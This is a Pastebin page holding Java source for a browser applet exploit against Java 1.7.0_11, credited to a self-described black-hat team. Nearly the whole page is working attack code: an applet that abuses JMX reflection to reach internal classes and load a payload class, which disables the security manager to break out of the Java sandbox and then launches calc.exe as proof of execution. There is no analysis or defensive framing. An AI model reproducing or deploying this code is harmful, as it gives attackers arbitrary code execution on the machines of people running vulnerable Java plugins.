Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * (Java 1.7.0_11 Exploit)
- *
- * Ngetes doank :v
- *
- * http://www.facebook.com/Gabby.IndoNesian.BlackHat.Team
- */
- import java.applet.Applet;
- import com.sun.jmx.mbeanserver.Introspector;
- import com.sun.jmx.mbeanserver.JmxMBeanServer;
- import com.sun.jmx.mbeanserver.MBeanInstantiator;
- import java.lang.invoke.MethodHandle;
- import java.lang.invoke.MethodHandles.Lookup;
- import java.lang.invoke.MethodType;
- import java.lang.reflect.InvocationTargetException;
- import java.lang.reflect.Method;
- import javax.management.ReflectionException;
- import java.io.*;
- public class PaunchGift extends Applet
- {
- public void init()
- {
- try
- {
- int length;
- byte[] buffer = new byte[5000];
- ByteArrayOutputStream os = new ByteArrayOutputStream();
- // read in the class file from the jar
- InputStream is = getClass().getResourceAsStream("Payload.class");
- // and write it out to the byte array stream
- while( ( length = is.read( buffer ) ) > 0 )
- os.write( buffer, 0, length );
- // convert it to a simple byte array
- buffer = os.toByteArray();
- Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");
- Method method = getMethod(class1, "enter", true);
- Object obj = method.invoke(null, new Object[0]);
- Method method1 = getMethod(class1, "createClassLoader", false);
- Object obj1 = method1.invoke(obj, new Object[1]);
- Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
- Method method2 = getMethod(class2, "defineClass", false);
- Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
- my_class.newInstance();
- Method m_outSandbox = my_class.getMethod("outSandbox", new Class[0]);
- m_outSandbox.invoke(null, new Object[] {});
- }
- catch (Throwable localThrowable){}
- }
- private Method getMethod(Class class1, String s, boolean flag)
- {
- try {
- Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
- Method[] amethod1 = amethod;
- for (int i = 0; i < amethod1.length; i++) {
- Method method = amethod1[i];
- String s1 = method.getName();
- Class[] aclass = method.getParameterTypes();
- if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
- }
- } catch (Exception localException) { }
- return null;
- }
- private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
- {
- Object obj = null;
- JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
- MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
- Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
- Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
- return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
- }
- }
- ###############################################
- import java.lang.reflect.Method;
- import java.security.AccessController;
- import java.security.PrivilegedExceptionAction;
- public class Payload implements PrivilegedExceptionAction
- {
- public Payload()
- {
- try
- {
- AccessController.doPrivileged(this);
- }
- catch(Exception exception) { }
- }
- public Object run() throws Exception
- {
- Class cl = System.class;
- Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
- m.invoke(null, new Object[1]);
- return null;
- }
- public static void outSandbox() throws Exception
- {
- Runtime.getRuntime().exec("calc.exe");
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement